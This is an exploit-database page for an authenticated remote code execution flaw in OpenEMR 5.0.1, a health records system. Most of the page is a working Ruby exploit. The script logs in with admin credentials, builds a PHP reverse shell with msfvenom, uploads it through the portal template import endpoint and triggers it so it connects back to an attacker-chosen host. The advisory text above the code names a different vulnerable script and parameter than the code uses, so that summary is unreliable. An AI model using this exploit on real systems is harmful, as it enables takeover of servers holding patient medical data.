OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)

vendor:

OpenEMR

by:

Alexandre ZANNI

9.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: OpenEMR

Affected Version From: < 5.0.1

Affected Version To: 5.0.1 (Patch 4)

Patch Exists: YES

Related CWE: N/A

CPE: a:openemr:openemr

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Ubuntu 18.04, OpenEMR Version 5.0.1.3

2020

OpenEMR 5.0.1 – Remote Code Execution (Authenticated) (2)

OpenEMR is a free and open source electronic health records and medical practice management application. A vulnerability exists in OpenEMR versions prior to 5.0.1 (Patch 4) that allows an authenticated user to execute arbitrary code on the server. This is due to the lack of input validation in the 'interface/main/calendar/add_edit_event.php' script, which allows an attacker to inject arbitrary PHP code into the 'form_comments' parameter. This code is then executed by the server when the 'Save' button is clicked.

Mitigation:

Upgrade to OpenEMR version 5.0.1 (Patch 4) or later.

Source

Exploit-DB raw data:

# Title: OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2)
# Exploit Author: Alexandre ZANNI
# Date: 2020-07-16
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile 
# Version: < 5.0.1 (Patch 4)
# Tested on: Ubuntu 18.04, OpenEMR Version 5.0.1.3
# References: https://www.exploit-db.com/exploits/48515

#!/usr/bin/env ruby

require 'httpclient'
require 'docopt'

shell_name = 'shell4.php'
user = 'openemr_admin'
password = 'xxxxxx'
payload = 'php/reverse_php'
lhost = '10.10.15.201'
lport = 8888

doc = <<~DOCOPT
  OpenEMR <= 5.0.1 - (Authenticated) Remote Code Execution

  Usage:
    #{__FILE__} manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug]
    #{__FILE__} semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug]
    #{__FILE__} auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug]
    #{__FILE__} -H | --help

  Options:
    -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
    -s <filename>, --shell <filename>     Filename of the PHP reverse shell payload
    -u <username>, --user <username>      Username of the admin
    -p <password>, --password <password>  Password of the admin
    -m <payload>, --payload <payload>     Metasploit PHP payload
    -h <host>, --lhost <host>             Reverse shell local host
    -t <port>, --lport <port>             Reverse shell local port
    --debug                               Display arguments
    -H, --help                            Show this screen

  Examples:
    #{__FILE__} manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
    #{__FILE__} semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
    #{__FILE__} auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999
DOCOPT

begin
  args = Docopt.docopt(doc)
  pp args if args['--debug']
  if args['manual']
    shell_name = File.basename(args['--shell'])
    shell_path = args['--shell']
  else
    shell_name = "tmp#{rand(1000)}.php"
    shell_path = shell_name
  end
  if args['semi-auto']
    payload = args['--payload']
  else
    payload = 'php/reverse_php'
  end
  # Authentication data
  uri_1 = URI("#{args['--root-url']}/interface/main/main_screen.php?auth=login&site=default")
  data_1= {
    'new_login_session_management' => '1',
    'authProvider' => 'Default',
    'authUser' => args['--user'],
    'clearPass' => args['--password'],
    'languageChoice' => '1'
  }
  # Reverse shell data
  unless args['manual']
    puts "[+] Generating the reverse shell payload: #{shell_name}"
    %x(msfvenom -p #{payload} LHOST=#{args['--lhost']} LPORT=#{args['--lport']} -f raw > #{shell_name})
  end
  data_2 = {
    'site' => 'default',
    'mode' => 'save',
    'docid' => shell_name,
    'content' => File.read(shell_path)}
  uri_2 = URI("#{args['--root-url']}/portal/import_template.php?site=default")
  uri_3 = URI("#{args['--root-url']}/portal/#{shell_name}")

  clnt = HTTPClient.new

  puts '[+] Authenticating'
  clnt.post(uri_1, data_1)

  puts '[+] Uploading the reverse shell'
  clnt.post(uri_2, data_2)

  puts "[+] Executing the reverse shell: #{args['--root-url']}/portal/#{shell_name}"
  clnt.get(uri_3)
rescue Docopt::Exit => e
  puts e.message
end